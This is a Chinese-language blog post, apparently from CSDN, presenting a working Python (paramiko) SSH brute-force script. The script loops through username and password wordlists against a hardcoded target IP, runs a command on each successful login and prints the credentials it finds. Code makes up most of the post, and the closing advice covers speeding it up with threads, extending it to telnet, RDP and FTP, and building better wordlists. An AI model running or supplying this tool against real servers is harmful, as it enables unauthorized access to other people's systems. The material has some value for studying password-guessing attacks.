#我的武器库#之SSH爆破核心实现

        Linux服务器多数开放SSH登陆,渗透人员可以通过Metasploit、hydra等工具进行爆破,其实通过python实现ssh爆破非常简单,核心思想为:1.通过paramiko组件创建client;2.采用用户名及密码的传统认证方式;3.从字典表读取用户名及密码进行逐一连接认证。

   一、源代码


#-*- coding:utf8 -*-
import paramiko

def crackhandle(client, ip, user, passwd, command):
    try:
        client.connect(ip, username=user, password=passwd)  #连接
        client.get_transport().banner_timeout = 2;
        ssh_session = client.get_transport().open_session() #打开会话
        if ssh_session.active:
            ssh_session.exec_command(command)   #执行命令
            return  ssh_session.recv(1024);
    except Exception as e:
        print(e);
        print("username [%s] password [%s] fail" % (user,passwd));
        return "";

def crack(ip,command):
    passwordsList = open("/root/Desktop/pythonTest/password.txt");
    usernamesList = open("/root/Desktop/pythonTest/username.txt");
    passwords = passwordsList.readlines();
    usernames = usernamesList.readlines();
    client = paramiko.SSHClient();
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy());
    switch = False;
    for usuername in usernames:
        username = usuername.strip();
        for password in passwords:
            password = password.strip();
            commandRecv = crackhandle(client,ip,str(username),str(password),command);
            if len(commandRecv)>1:
                print("success userName is %s password is %s" % (username,password));
                switch = True;
                break;
        if switch:
            break;
crack("192.168.1.102","id");

#crackhandle("127.0.0.1","root","toor","id");

代码中我加了cmd的指令输出作为认证,其实没必要。

运行指令: python sshCrack.py

效果图如下,可以看到爆破成功。

二、下一步优化

在优化方面,可以分为三个层面。

      1.性能 :与线程结合,加快爆破速度,提升爆破效率。

      2.功能:形成爆破工具箱,可对ssh、telnet、3389、ftp等爆破代码进行整合,方便渗透人员便捷使用。业界已有非常出色的工具箱,通过自己动手编写代码了解原理和实现方式还是非常有必要的。

      3.字典表:爆破是否成功在与字典表,足够丰富又具有针对性的字典表非常重要。

发布了35 篇原创文章 · 获赞 3 · 访问量 2920

猜你喜欢

转载自blog.csdn.net/a59a59/article/details/94607274